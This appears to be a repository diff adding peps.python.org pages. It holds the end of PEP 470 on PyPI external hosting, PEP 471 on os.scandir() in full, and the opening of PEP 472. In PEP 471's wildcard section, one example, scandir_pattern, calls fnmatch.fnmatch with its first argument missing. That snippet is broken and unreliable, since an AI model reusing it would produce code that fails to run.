PEP 438 was successful in bringing more people to utilize PyPI’s +repository features, an altogether good thing given the global CDN powering +PyPI provides speed ups for a lot of people; however, it did so by introducing +a new point of confusion and pain for both the end users and the authors.

+

By moving to using explicit multiple repositories we can make the lines between +these two roles much more explicit and remove the “hidden” surprises caused by +the current implementation of handling people who do not want to use PyPI as a +repository.

+
+

Key User Experience Expectations

+
    +
  1. Easily allow external hosting to “just work” when appropriately configured +at the system, user or virtual environment level.
  2. +
  3. Eliminate any and all references to the confusing “verifiable external” and +“unverifiable external” distinction from the user experience (both when +installing and when releasing packages).
  4. +
  5. The repository aspects of PyPI should become just the default package +hosting location (i.e. the only one that is treated as opt-out rather than +opt-in by most client tools in their default configuration). Aside from that +aspect, hosting on PyPI should not otherwise provide an enhanced user +experience over hosting your own package repository.
  6. +
  7. Do all of the above while providing default behaviour that is secure against +most attackers below the nation state adversary level.
  8. +
+
+
+

Why Additional Repositories?

+

The two common installer tools, pip and easy_install/setuptools, both support +the concept of additional locations to search for files to satisfy the +installation requirements and have done so for many years. This means that +there is no need to “phase” in a new flag or concept and the solution to +installing a project from a repository other than PyPI will function regardless +of how old (within reason) the end user’s installer is. Not only has this +concept existed in the Python tooling for some time, but it is a concept that +exists across languages and even extending to the OS level with OS package +tools almost universally using multiple repository support making it extremely +likely that someone is already familiar with the concept.

+

Additionally, the multiple repository approach is a concept that is useful +outside of the narrow scope of allowing projects that wish to be included on +the index portion of PyPI but do not wish to utilize the repository portion of +PyPI. This includes places where a company may wish to host a repository that +contains their internal packages or where a project may wish to have multiple +“channels” of releases, such as alpha, beta, release candidate, and final +release. This could also be used for projects wishing to host files which +cannot be uploaded to PyPI, such as multi-gigabyte data files or, currently at +least, Linux Wheels.

+
+
+

Why Not PEP 438 or Similar?

+

While the additional search location support has existed in pip and setuptools +for quite some time, support for PEP 438 has only existed in pip since the 1.4 +version, and has yet to be implemented in setuptools. The design of +PEP 438 did mean that users still benefited in the case of projects which did not require +external files, even with older installers; however, for projects which did +require external files, users are still silently being given either potentially +unreliable or, even worse, unsafe files to download. This system is also unique +to Python as it arises out of the history of PyPI; this means that it is almost +certain that this concept will be foreign to most, if not all, users until they +encounter it while attempting to use the Python toolchain.

+

Additionally, the classification system proposed by PEP 438 has, in practice, +turned out to be extremely confusing to end users, so much so that it is a +position of this PEP that the situation as it stands is completely untenable. +The common pattern for a user with this system is to attempt to install a +project, possibly get an error message (or maybe not, if the project ever +uploaded something to PyPI but later switched without removing old files), see +that the error message suggests --allow-external, reissue the command +adding that flag (most likely getting another error message), see that this time +the error message suggests also adding --allow-unverified, and issue +the command a third time, this time finally getting the thing they wish to +install.

+

This UX failure exists for several reasons.

+
    +
  1. If pip can locate files at all for a project on the Simple API it will +simply use that instead of attempting to locate more. This is generally the +right thing to do as attempting to locate more would erase a large part of +the benefit of PEP 438. This means that if a project ever uploaded a file +that matches what the user has requested for install that will be used +regardless of how old it is.
  2. +
  3. PEP 438 makes an implicit assumption that most projects would either upload +themselves to PyPI or would update themselves to link directly to release +files. While a large number of projects did ultimately decide to upload to +PyPI, some of them did so only because the UX around PEP 438 was so bad +that they felt forced to do so. More concerning, however, is the fact that +very few projects have opted to directly and safely link to files and +instead they still simply link to pages which must be scraped in order to +find the actual files, thus rendering the safe variant +(--allow-external) largely useless.
  4. +
  5. Even if an author wishes to directly link to their files, doing so safely is +non-obvious. It requires the inclusion of a MD5 hash (for historical +reasons) in the hash of the URL. If they do not include this then their +files will be considered “unverified”.
  6. +
  7. PEP 438 takes a security centric view and disallows any form of a global opt +in for unverified projects. While this is generally a good thing, it creates +extremely verbose and repetitive command invocations such as:
    $ pip install --allow-external myproject --allow-unverified myproject myproject
    +$ pip install --allow-all-external --allow-unverified myproject myproject
    +
    +
    +
  8. +
+
+
+
+

Multiple Repository/Index Support

+

Installers SHOULD implement or continue to offer, the ability to point the +installer at multiple URL locations. The exact mechanisms for a user to +indicate they wish to use an additional location is left up to each individual +implementation.

+

Additionally, the mechanism for discovering an installation candidate when multiple +repositories are being used is also up to each individual implementation; +however, once configured an implementation should not discourage, warn, or +otherwise cast a negative light upon the use of a repository simply because it +is not the default repository.

+

Currently both pip and setuptools implement multiple repository support by +using the best installation candidate it can find from either repository, +essentially treating it as if it were one large repository.

+

Installers SHOULD also implement some mechanism for removing or otherwise +disabling use of the default repository. The exact specifics of how that is +achieved is up to each individual implementation.
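For instance, pip already exposes flags along these lines (the repository URL below is hypothetical):

$ # search an additional repository as well as the default one
$ pip install --extra-index-url https://example.com/simple/ myproject
$ # replace the default repository entirely
$ pip install --index-url https://example.com/simple/ myproject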

+

Installers SHOULD also implement some mechanism for whitelisting and +blacklisting which projects a user wishes to install from a particular +repository. The exact specifics of how that is achieved is up to each +individual implementation.

+

The Python packaging guide MUST be updated +with a section detailing the options for setting up their own repository so +that any project that wishes to not host on PyPI in the future can reference +that documentation. This should include the suggestion that projects relying on +hosting their own repositories should document in their project description how +to install their project.

+
+ +
+

Summary of Changes

+
+

Repository side

+
    +
  1. Deprecate and remove the hosting modes as defined by PEP 438.
  2. +
  3. Restrict simple API to only list the files that are contained within the +repository.
  4. +
+
+
+

Client side

+
    +
  1. Implement multiple repository support.
  2. +
  3. Implement some mechanism for removing/disabling the default repository.
  4. +
  5. Deprecate / Remove PEP 438
  6. +
+
+
+
+

Impact

+

To determine impact, we’ve looked at all projects using a method of searching +PyPI which is similar to what pip and setuptools use and searched for all +files available on PyPI, safely linked from PyPI, unsafely linked from PyPI, +and finally unsafely available outside of PyPI. When the same file was found +in multiple locations it was deduplicated and counted in only one location +based on the following preferences: PyPI > Safely Off PyPI > Unsafely Off PyPI. +This gives us the broadest possible definition of impact; it means that any +single file for this project may no longer be visible by default, however that +file could be years old, or it could be a binary file while there is a sdist +available on PyPI. This means that the real impact will likely be much +smaller, but in an attempt not to miscount we take the broadest possible +definition.

+

At the time of this writing there are 65,232 projects hosted on PyPI and of +those, 59 of them rely on external files that are safely hosted outside of PyPI +and 931 of them rely on external files which are unsafely hosted outside of +PyPI. This shows us that 1.5% of projects will be affected in some way by this +change while 98.5% will continue to function as they always have. In addition, +only 5% of the projects affected are using the features provided by PEP 438 to +safely host outside of PyPI while 95% of them are exposing their users to +Remote Code Execution via a Man In The Middle attack.

+
+
+

Frequently Asked Questions

+
+

I can’t host my project on PyPI because of <X>, what should I do?

+

First you should decide if <X> is something inherent to PyPI, or if PyPI could +grow a feature to solve <X> for you. If PyPI can add a feature to enable you to +host your project on PyPI then you should propose that feature. However, if <X> +is something inherent to PyPI, such as wanting to maintain control over your +own files, then you should set up your own package repository and instruct your +users in your project’s description to add it to the list of repositories their +installer of choice will use.

+
+
+

My users have a worse experience with this PEP than before, how do I explain that?

+

Part of this answer is going to be specific to each individual project, you’ll +need to explain to your users what caused you to decide to host in your own +repository instead of utilizing one that they already have in their installer’s +default list of repositories. However, part of this answer will also be +explaining that the previous behavior of transparently including external links +was both a security hazard (given that in most cases it allowed a MITM to +execute arbitrary Python code on the end users machine) and a reliability +concern and that PEP 438 attempted to resolve this by making them explicitly +opt in, but that PEP 438 brought along with it a number of serious usability +issues. PEP 470 represents a simplification of the model to a model that many +users will be familiar with, which is common amongst Linux distributions.

+
+
+

Switching to a repository structure breaks my workflow or isn’t allowed by my host?

+

There are a number of cheap or free hosts that would gladly support what is +required for a repository. In particular you don’t actually need to upload your +files anywhere differently as long as you can generate a host with the correct +structure that points to where your files are actually located. Many of these +hosts provide free HTTPS using a shared domain name, and free HTTPS +certificates can be gotten from StartSSL, or in +the near future LetsEncrypt or they may be gotten +cheap from any number of providers.

+
+
+

Why don’t you provide <X>?

+

The answer here will depend on what <X> is, however the answers typically are +one of:

+
    +
  • We hadn’t thought of it and nobody had suggested it before.
  • +
  • We don’t have sufficient experience with <X> to properly design a solution +for it and would welcome a domain expert to help us provide it.
  • +
  • We’re an open source project and nobody has decided to volunteer to design +and implement <X> yet.
  • +
+

Additional PEPs to propose additional features are always welcome, however they +would need someone with the time and expertise to accurately design <X>. This +particular PEP is intended to focus on getting us to a point where the +capabilities of PyPI are straightforward with an easily understood baseline +that is similar to existing models such as Linux distribution repositories.

+
+
+

Why should I register on PyPI if I’m running my own repository anyways?

+

PyPI serves two critical functions for the Python ecosystem. One of those is as +a central repository for the actual files that get downloaded and installed by +pip or another package manager and it is this function that this PEP is +concerned with and that you’d be replacing if you’re running your own +repository. However, it also provides a central registry of who owns what name +in order to prevent naming collisions, think of it sort of as DNS but for +Python packages. In addition to making sure that names are handed out in a +first-come, first-served manner it also provides a single place for users to go +to search for and discover new projects. So the simple answer is, you +should still register your project with PyPI to avoid naming collisions and to +make it so people can still easily discover your project.

+
+
+
+

Rejected Proposals

+
+

Allow easier discovery of externally hosted indexes

+

A previous version of this PEP included a new feature added to both PyPI and +installers that would allow project authors to enter into PyPI a list of +URLs that would instruct installers to ignore any files uploaded to PyPI and +instead return an error telling the end user about these extra URLs that they +can add to their installer to make the installation work.

+

This feature has been removed from the scope of the PEP because it proved too +difficult to develop a solution that avoided UX issues similar to those that +caused so many problems with the PEP 438 solution. If needed, a future PEP +could revisit this idea.

+
+
+

Keep the current classification system but adjust the options

+

This PEP rejects several related proposals which attempt to fix some of the +usability problems with the current system but while still keeping the general +gist of PEP 438.

+

This includes:

+
    +
  • Default to allowing safely externally hosted files, but disallow unsafely +hosted.
  • +
  • Default to disallowing safely externally hosted files with only a global flag +to enable them, but disallow unsafely hosted.
  • +
  • Continue on the suggested path of PEP 438 and remove the option to unsafely +host externally but continue to allow the option to safely host externally.
  • +
+

These proposals are rejected because:

+
    +
  • The classification system introduced in PEP 438 is an entirely unique concept +to PyPI which is not generically applicable even in the context of Python +packaging. Adding additional concepts comes at a cost.
  • +
  • The classification system itself is non-obvious to explain and to +pre-determine what classification of link a project will require entails +inspecting the project’s /simple/<project>/ page, and possibly any URLs +linked from that page.
  • +
  • The ability to host externally while still being linked for automatic +discovery is mostly a historic relic which causes a fair amount of pain and +complexity for little reward.
  • +
  • The installer’s ability to optimize or clean up the user interface is limited +due to the nature of the implicit link scraping which would need to be done. +This extends to the --allow-* options as well as the inability to +determine if a link is expected to fail or not.
  • +
  • The mechanism paints a very broad brush when enabling an option, while +PEP 438 attempts to limit this with per package options. However a project +that has existed for an extended period of time may oftentimes have several +different URLs listed in their simple index. It is not unusual for at least +one of these to no longer be under control of the project. While an +unregistered domain will sit there relatively harmless most of the time, pip +will continue to attempt to install from it on every discovery phase. This +means that an attacker simply needs to look at projects which rely on unsafe +external URLs and register expired domains to attack users.
  • +
+
+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0470.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0471/index.html b/pep-0471/index.html new file mode 100644 index 00000000000..4be929003a7 --- /dev/null +++ b/pep-0471/index.html @@ -0,0 +1,733 @@ + PEP 471 – os.scandir() function – a better and faster directory iterator | peps.python.org
+
+


+ + +
+
+
+

PEP 471 – os.scandir() function – a better and faster directory iterator

+
+
Author:
+
Ben Hoyt <benhoyt at gmail.com>
+
BDFL-Delegate:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-May-2014
+
Python-Version:
+
3.5
+
Post-History:
+
27-Jun-2014, 08-Jul-2014, 14-Jul-2014
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes including a new directory iteration function, +os.scandir(), in the standard library. This new function adds +useful functionality and increases the speed of os.walk() by 2-20 +times (depending on the platform and file system) by avoiding calls to +os.stat() in most cases.

+
+
+

Rationale

+

Python’s built-in os.walk() is significantly slower than it needs +to be, because – in addition to calling os.listdir() on each +directory – it executes the stat() system call or +GetFileAttributes() on each file to determine whether the entry is +a directory or not.

+

But the underlying system calls – FindFirstFile / +FindNextFile on Windows and readdir on POSIX systems – +already tell you whether the files returned are directories or not, so +no further system calls are needed. Further, the Windows system calls +return all the information for a stat_result object on the directory +entry, such as file size and last modification time.

+

In short, you can reduce the number of system calls required for a +tree function like os.walk() from approximately 2N to N, where N +is the total number of files and directories in the tree. (And because +directory trees are usually wider than they are deep, it’s often much +better than this.)

+

In practice, removing all those extra system calls makes os.walk() +about 8-9 times as fast on Windows, and about 2-3 times as fast +on POSIX systems. So we’re not talking about +micro-optimizations. See more benchmarks here.

+

Somewhat relatedly, many people (see Python Issue 11406) are also +keen on a version of os.listdir() that yields filenames as it +iterates instead of returning them as one big list. This improves +memory efficiency for iterating very large directories.

+

So, as well as providing a scandir() iterator function for calling +directly, Python’s existing os.walk() function can be sped up a +huge amount.

+
+
+

Implementation

+

The implementation of this proposal was written by Ben Hoyt (initial +version) and Tim Golden (who helped a lot with the C extension +module). It lives on GitHub at benhoyt/scandir. (The implementation +may lag behind the updates to this PEP a little.)

+

Note that this module has been used and tested (see “Use in the wild” +section in this PEP), so it’s more than a proof-of-concept. However, +it is marked as beta software and is not extensively battle-tested. +It will need some cleanup and more thorough testing before going into +the standard library, as well as integration into posixmodule.c.

+
+
+

Specifics of proposal

+
+

os.scandir()

+

Specifically, this PEP proposes adding a single function to the os +module in the standard library, scandir, that takes a single, +optional string as its argument:

+
scandir(path='.') -> generator of DirEntry objects
+
+
+

Like listdir, scandir calls the operating system’s directory +iteration system calls to get the names of the files in the given +path, but it’s different from listdir in two ways:

+
    +
  • Instead of returning bare filename strings, it returns lightweight +DirEntry objects that hold the filename string and provide +simple methods that allow access to the additional data the +operating system may have returned.
  • +
  • It returns a generator instead of a list, so that scandir acts +as a true iterator instead of returning the full list immediately.
  • +
+

scandir() yields a DirEntry object for each file and +sub-directory in path. Just like listdir, the '.' +and '..' pseudo-directories are skipped, and the entries are +yielded in system-dependent order. Each DirEntry object has the +following attributes and methods:

+
    +
  • name: the entry’s filename, relative to the scandir path +argument (corresponds to the return values of os.listdir)
  • +
  • path: the entry’s full path name (not necessarily an absolute +path) – the equivalent of os.path.join(scandir_path, +entry.name)
  • +
  • inode(): return the inode number of the entry. The result is cached on +the DirEntry object; use os.stat(entry.path, +follow_symlinks=False).st_ino to fetch up-to-date information. +On Unix, no system call is required.
  • +
  • is_dir(*, follow_symlinks=True): similar to +pathlib.Path.is_dir(), but the return value is cached on the +DirEntry object; doesn’t require a system call in most cases; +don’t follow symbolic links if follow_symlinks is False
  • +
  • is_file(*, follow_symlinks=True): similar to +pathlib.Path.is_file(), but the return value is cached on the +DirEntry object; doesn’t require a system call in most cases; +don’t follow symbolic links if follow_symlinks is False
  • +
  • is_symlink(): similar to pathlib.Path.is_symlink(), but the +return value is cached on the DirEntry object; doesn’t require a +system call in most cases
  • +
  • stat(*, follow_symlinks=True): like os.stat(), but the +return value is cached on the DirEntry object; does not require a +system call on Windows (except for symlinks); don’t follow symbolic links +(like os.lstat()) if follow_symlinks is False
  • +
+

All methods may perform system calls in some cases and therefore +possibly raise OSError – see the “Notes on exception handling” +section for more details.

+

The DirEntry attribute and method names were chosen to be the same +as those in the new pathlib module where possible, for +consistency. The only difference in functionality is that the +DirEntry methods cache their values on the entry object after the +first call.
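A small sketch of that caching difference:

import os

for entry in os.scandir('.'):
    st = entry.stat()    # may perform a system call the first time
    st = entry.stat()    # subsequent calls return the cached result
    print(entry.name, st.st_size)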

+

Like the other functions in the os module, scandir() accepts +either a bytes or str object for the path parameter, and +returns the DirEntry.name and DirEntry.path attributes with +the same type as path. However, it is strongly recommended +to use the str type, as this ensures cross-platform support for +Unicode filenames. (On Windows, bytes filenames have been deprecated +since Python 3.3).

+
+
+

os.walk()

+

As part of this proposal, os.walk() will also be modified to use +scandir() rather than listdir() and os.path.isdir(). This +will increase the speed of os.walk() very significantly (as +mentioned above, by 2-20 times, depending on the system).

+
+
+
+

Examples

+

First, a very simple example of scandir() showing use of the +DirEntry.name attribute and the DirEntry.is_dir() method:

+
def subdirs(path):
+    """Yield directory names not starting with '.' under given path."""
+    for entry in os.scandir(path):
+        if not entry.name.startswith('.') and entry.is_dir():
+            yield entry.name
+
+
+

This subdirs() function will be significantly faster with scandir +than os.listdir() and os.path.isdir() on both Windows and POSIX +systems, especially on medium-sized or large directories.

+

Or, for getting the total size of files in a directory tree, showing +use of the DirEntry.stat() method and DirEntry.path +attribute:

+
def get_tree_size(path):
+    """Return total size of files in given path and subdirs."""
+    total = 0
+    for entry in os.scandir(path):
+        if entry.is_dir(follow_symlinks=False):
+            total += get_tree_size(entry.path)
+        else:
+            total += entry.stat(follow_symlinks=False).st_size
+    return total
+
+
+

This also shows the use of the follow_symlinks parameter to +is_dir() – in a recursive function like this, we probably don’t +want to follow links. (To properly follow links in a recursive +function like this we’d want special handling for the case where +following a symlink leads to a recursive loop.)

+

Note that get_tree_size() will get a huge speed boost on Windows, +because no extra stat calls are needed, but on POSIX systems the size +information is not returned by the directory iteration functions, so +this function won’t gain anything there.

+
+

Notes on caching

+

The DirEntry objects are relatively dumb – the name and +path attributes are obviously always cached, and the is_X +and stat methods cache their values (immediately on Windows via +FindNextFile, and on first use on POSIX systems via a stat +system call) and never refetch from the system.

+

For this reason, DirEntry objects are intended to be used and +thrown away after iteration, not stored in long-lived data structures +with the methods called again and again.

+

If developers want “refresh” behaviour (for example, for watching a +file’s size change), they can simply use pathlib.Path objects, +or call the regular os.stat() or os.path.getsize() functions +which get fresh data from the operating system every call.
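For example (the file name is hypothetical):

import os
import pathlib

path = pathlib.Path('data.log')
size_now = path.stat().st_size            # fresh stat() on every call
size_also = os.path.getsize('data.log')   # likewise refetches from the OS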

+
+
+

Notes on exception handling

+

DirEntry.is_X() and DirEntry.stat() are explicitly methods +rather than attributes or properties, to make it clear that they may +not be cheap operations (although they often are), and they may do a +system call. As a result, these methods may raise OSError.

+

For example, DirEntry.stat() will always make a system call on +POSIX-based systems, and the DirEntry.is_X() methods will make a +stat() system call on such systems if readdir() does not +support d_type or returns a d_type with a value of +DT_UNKNOWN, which can occur under certain conditions or on +certain file systems.

+

Often this does not matter – for example, os.walk() as defined in +the standard library only catches errors around the listdir() +calls.

+

Also, because the exception-raising behaviour of the DirEntry.is_X +methods matches that of pathlib – which only raises OSError +in the case of permissions or other fatal errors, but returns False +if the path doesn’t exist or is a broken symlink – it’s often +not necessary to catch errors around the is_X() calls.

+

However, when a user requires fine-grained error handling, it may be +desirable to catch OSError around all method calls and handle as +appropriate.

+

For example, below is a version of the get_tree_size() example +shown above, but with fine-grained error handling added:

+
def get_tree_size(path):
+    """Return total size of files in path and subdirs. If
+    is_dir() or stat() fails, print an error message to stderr
+    and assume zero size (for example, file has been deleted).
+    """
+    total = 0
+    for entry in os.scandir(path):
+        try:
+            is_dir = entry.is_dir(follow_symlinks=False)
+        except OSError as error:
+            print('Error calling is_dir():', error, file=sys.stderr)
+            continue
+        if is_dir:
+            total += get_tree_size(entry.path)
+        else:
+            try:
+                total += entry.stat(follow_symlinks=False).st_size
+            except OSError as error:
+                print('Error calling stat():', error, file=sys.stderr)
+    return total
+
+
+
+
+
+

Support

+

The scandir module on GitHub has been forked and used quite a bit (see +“Use in the wild” in this PEP), but there’s also been a fair bit of +direct support for a scandir-like function from core developers and +others on the python-dev and python-ideas mailing lists. A sampling:

+
    +
  • python-dev: a good number of +1’s and very few negatives for +scandir and PEP 471 on this June 2014 python-dev thread
  • +
  • Alyssa Coghlan, a core Python developer: “I’ve had the local Red +Hat release engineering team express their displeasure at having to +stat every file in a network mounted directory tree for info that is +present in the dirent structure, so a definite +1 to os.scandir from +me, so long as it makes that info available.” +[source1]
  • +
  • Tim Golden, a core Python developer, supports scandir enough to +have spent time refactoring and significantly improving scandir’s C +extension module. +[source2]
  • +
  • Christian Heimes, a core Python developer: “+1 for something +like yielddir()” +[source3] +and “Indeed! I’d like to see the feature in 3.4 so I can remove my +own hack from our code base.” +[source4]
  • +
  • Gregory P. Smith, a core Python developer: “As 3.4beta1 happens +tonight, this isn’t going to make 3.4 so i’m bumping this to 3.5. +I really like the proposed design outlined above.” +[source5]
  • +
  • Guido van Rossum on the possibility of adding scandir to Python +3.5 (as it was too late for 3.4): “The ship has likewise sailed for +adding scandir() (whether to os or pathlib). By all means experiment +and get it ready for consideration for 3.5, but I don’t want to add +it to 3.4.” +[source6]
  • +
+

Support for this PEP itself (meta-support?) was given by Alyssa (Nick) Coghlan +on python-dev: “A PEP reviewing all this for 3.5 and proposing a +specific os.scandir API would be a good thing.” +[source7]

+
+
+

Use in the wild

+

To date, the scandir implementation is definitely useful, but has +been clearly marked “beta”, so it’s uncertain how much use of it there +is in the wild. Ben Hoyt has had several reports from people using it. +For example:

+
    +
  • Chris F: “I am processing some pretty large directories and was half +expecting to have to modify getdents. So thanks for saving me the +effort.” [via personal email]
  • +
  • bschollnick: “I wanted to let you know about this, since I am using +Scandir as a building block for this code. Here’s a good example of +scandir making a radical performance improvement over os.listdir.” +[source8]
  • +
  • Avram L: “I’m testing our scandir for a project I’m working on. +Seems pretty solid, so first thing, just want to say nice work!” +[via personal email]
  • +
  • Matt Z: “I used scandir to dump the contents of a network dir in +under 15 seconds. 13 root dirs, 60,000 files in the structure. This +will replace some old VBA code embedded in a spreadsheet that was +taking 15-20 minutes to do the exact same thing.” [via personal +email]
  • +
+

Others have requested a PyPI package for it, which has been +created. See PyPI package.

+

GitHub stats don’t mean too much, but scandir does have several +watchers, issues, forks, etc. Here’s the run-down as of the stats as +of July 7, 2014:

+
    +
  • Watchers: 17
  • +
  • Stars: 57
  • +
  • Forks: 20
  • +
  • Issues: 4 open, 26 closed
  • +
+

Also, because this PEP will increase the speed of os.walk() +significantly, there are thousands of developers and scripts, and a lot +of production code, that would benefit from it. For example, on GitHub, +there are almost as many uses of os.walk (194,000) as there are of +os.mkdir (230,000).

+
+
+

Rejected ideas

+
+

Naming

+

The only other real contender for this function’s name was +iterdir(). However, iterX() functions in Python (mostly found +in Python 2) tend to be simple iterator equivalents of their +non-iterator counterparts. For example, dict.iterkeys() is just an +iterator version of dict.keys(), but the objects returned are +identical. In scandir()’s case, however, the return values are +quite different objects (DirEntry objects vs filename strings), so +this should probably be reflected by a difference in name – hence +scandir().

+

See some relevant discussion on python-dev.

+
+
+

Wildcard support

+

FindFirstFile/FindNextFile on Windows support passing a +“wildcard” like *.jpg, so at first folks (this PEP’s author +included) felt it would be a good idea to include a +windows_wildcard keyword argument to the scandir function so +users could pass this in.

+

However, on further thought and discussion it was decided that this would be a bad idea, unless it could be made cross-platform (a pattern keyword argument or similar). This seems easy enough at first – just use the OS wildcard support on Windows, and something like fnmatch or re afterwards on POSIX-based systems.
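For illustration, the cross-platform approach that was considered would amount to something like the following sketch (scandir_pattern is a hypothetical helper, written against the os.scandir() API as it eventually shipped in Python 3.5):

import fnmatch
import os

def scandir_pattern(path, pattern):
    """Yield the DirEntry objects whose names match the given pattern.

    A sketch of the considered 'pattern' keyword argument, filtering
    with fnmatch after the fact. Note that fnmatch's rules are not
    identical to the Windows FindFirstFile wildcard rules.
    """
    for entry in os.scandir(path):
        if fnmatch.fnmatch(, pattern):
            yield entry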

+

Unfortunately the exact Windows wildcard matching rules aren’t really +documented anywhere by Microsoft, and they’re quite quirky (see this +blog post), +meaning it’s very problematic to emulate using fnmatch or regexes.

+

So the consensus was that Windows wildcard support was a bad idea. +It would be possible to add at a later date if there’s a +cross-platform way to achieve it, but not for the initial version.

+

Read more on this Nov 2012 python-ideas thread and this June 2014 python-dev thread on PEP 471.

+
+ +
+

DirEntry attributes being properties

+

In some ways it would be nicer for the DirEntry is_X() and stat() methods to be properties instead, to indicate they’re very cheap or free. However, this isn’t quite the case, as stat() will require an OS call on POSIX-based systems but not on Windows. Even is_dir() and friends may perform an OS call on POSIX-based systems if the dirent.d_type value is DT_UNKNOWN (on certain file systems).

+

Also, people would expect the attribute access entry.is_dir to +only ever raise AttributeError, not OSError in the case it +makes a system call under the covers. Calling code would have to have +a try/except around what looks like a simple attribute access, +and so it’s much better to make them methods.
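With methods, the possible OS interaction is explicit at the call site and the try/except reads naturally. A minimal sketch, using the os.scandir() API as it eventually shipped in Python 3.5:

import os

def count_subdirs(path):
    total = 0
    for entry in os.scandir(path):
        try:
            if entry.is_dir():  # may call the OS if d_type was DT_UNKNOWN
                total += 1
        except OSError:
            pass  # the explicit method call makes this handling natural
    return total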

+

See this May 2013 python-dev thread where this PEP author makes this case and there’s agreement from core developers.

+
+
+

DirEntry fields being “static” attribute-only objects

+

In this July 2014 python-dev message, +Paul Moore suggested a solution that was a “thin wrapper round the OS +feature”, where the DirEntry object had only static attributes: +name, path, and is_X, with the st_X attributes only +present on Windows. The idea was to use this simpler, lower-level +function as a building block for higher-level functions.

+

At first there was general agreement that simplifying in this way was a good thing. However, there were two problems with this approach. First, it assumes that the is_dir and similar attributes are always present on POSIX, which isn’t the case (if d_type is not present or is DT_UNKNOWN). Second, it’s a much harder-to-use API in practice: because the is_dir attributes aren’t always present on POSIX, callers would need to test for them with hasattr() and then call os.stat() when they were missing.
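A sketch of the fallback dance this would force on callers (hypothetical, since DirEntry as shipped always provides is_dir()):

import os
import stat

def entry_is_dir(entry):
    # Under the "static attributes" proposal, POSIX callers would need
    # a fallback whenever is_dir is absent (e.g. d_type was DT_UNKNOWN).
    if hasattr(entry, "is_dir"):
        return entry.is_dir
    return stat.S_ISDIR(os.stat(entry.path).st_mode)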

+

See this July 2014 python-dev response +from this PEP’s author detailing why this option is a non-ideal +solution, and the subsequent reply from Paul Moore voicing agreement.

+
+
+

DirEntry fields being static with an ensure_lstat option

+

Another seemingly simpler and attractive option was suggested by +Alyssa Coghlan in this June 2014 python-dev message: +make DirEntry.is_X and DirEntry.lstat_result properties, and +populate DirEntry.lstat_result at iteration time, but only if +the new argument ensure_lstat=True was specified on the +scandir() call.

+

This does have the advantage over the above in that you can easily get +the stat result from scandir() if you need it. However, it has the +serious disadvantage that fine-grained error handling is messy, +because stat() will be called (and hence potentially raise +OSError) during iteration, leading to a rather ugly, hand-made +iteration loop:

+
it = os.scandir(path)
while True:
    try:
        entry = next(it)
    except OSError as error:
        handle_error(path, error)   # lstat() failed during iteration
    except StopIteration:
        break
    # ... process entry here ...
+
+
+

Or it means that scandir() would have to accept an onerror +argument – a function to call when stat() errors occur during +iteration. This seems to this PEP’s author neither as direct nor as +Pythonic as try/except around a DirEntry.stat() call.

+

Another drawback is that os.scandir() is written to make code faster. +Always calling os.lstat() on POSIX would not bring any speedup. In most +cases, you don’t need the full stat_result object – the is_X() +methods are enough and this information is already known.

+

See Ben Hoyt’s July 2014 reply +to the discussion summarizing this and detailing why he thinks the +original PEP 471 proposal is “the right one” after all.

+
+
+

Return values being (name, stat_result) two-tuples

+

Initially this PEP’s author proposed this concept as a function called +iterdir_stat() which yielded two-tuples of (name, stat_result). +This does have the advantage that there are no new types introduced. +However, the stat_result is only partially filled on POSIX-based +systems (most fields set to None and other quirks), so they’re not +really stat_result objects at all, and this would have to be +thoroughly documented as different from os.stat().

+

Also, Python has good support for proper objects with attributes and +methods, which makes for a saner and simpler API than two-tuples. It +also makes the DirEntry objects more extensible and future-proof +as operating systems add functionality and we want to include this in +DirEntry.

+

See also some previous discussion:

+ +
+
+

Return values being overloaded stat_result objects

+

Another alternative discussed was making the return values overloaded stat_result objects with name and path attributes. However, apart from this being a strange (and strained!) kind of overloading, this has the same problems mentioned above – most of the stat_result information is not fetched by readdir() on POSIX systems, only (part of) the st_mode value.

+
+
+

Return values being pathlib.Path objects

+

With Antoine Pitrou’s new standard library pathlib module, it +at first seems like a great idea for scandir() to return instances +of pathlib.Path. However, pathlib.Path’s is_X() and +stat() functions are explicitly not cached, whereas scandir +has to cache them by design, because it’s (often) returning values +from the original directory iteration system call.

+

And if the pathlib.Path instances returned by scandir cached +stat values, but the ordinary pathlib.Path objects explicitly +don’t, that would be more than a little confusing.

+

Guido van Rossum explicitly rejected pathlib.Path caching stat in +the context of scandir here, +making pathlib.Path objects a bad choice for scandir return +values.

+
+
+
+

Possible improvements

+

There are many possible improvements one could make to scandir, but +here is a short list of some this PEP’s author has in mind:

+
    +
  • scandir could potentially be further sped up by calling readdir / FindNextFile say 50 times per Py_BEGIN_ALLOW_THREADS block so that it stays in the C extension module for longer, and may be somewhat faster as a result. This approach hasn’t been tested, but was suggested on Issue 11406 by Antoine Pitrou. [source9]
  • +
  • scandir could use a free list to avoid the cost of memory allocation +for each iteration – a short free list of 10 or maybe even 1 may help. +Suggested by Victor Stinner on a python-dev thread on June 27.
  • +
+
+
+

Previous discussion

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0471.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0472/index.html b/pep-0472/index.html new file mode 100644 index 00000000000..25b0bd36bfe --- /dev/null +++ b/pep-0472/index.html @@ -0,0 +1,800 @@ + + + + + + + + PEP 472 – Support for indexing with keyword arguments | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 472 – Support for indexing with keyword arguments

+
+
Author:
+
Stefano Borini, Joseph Martinot-Lagarde
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
24-Jun-2014
+
Python-Version:
+
3.6
+
Post-History:
+
02-Jul-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an extension of the indexing operation to support keyword arguments. Notations in the form a[K=3, R=2] would become legal syntax. For future-proofing considerations, notations such as a[1:2, K=3, R=4] are considered and may be allowed as well, depending on the choice of implementation. In addition to a change in the parser, the index protocol (__getitem__, __setitem__ and __delitem__) will also potentially require adaptation.

+
+
+

Motivation

+

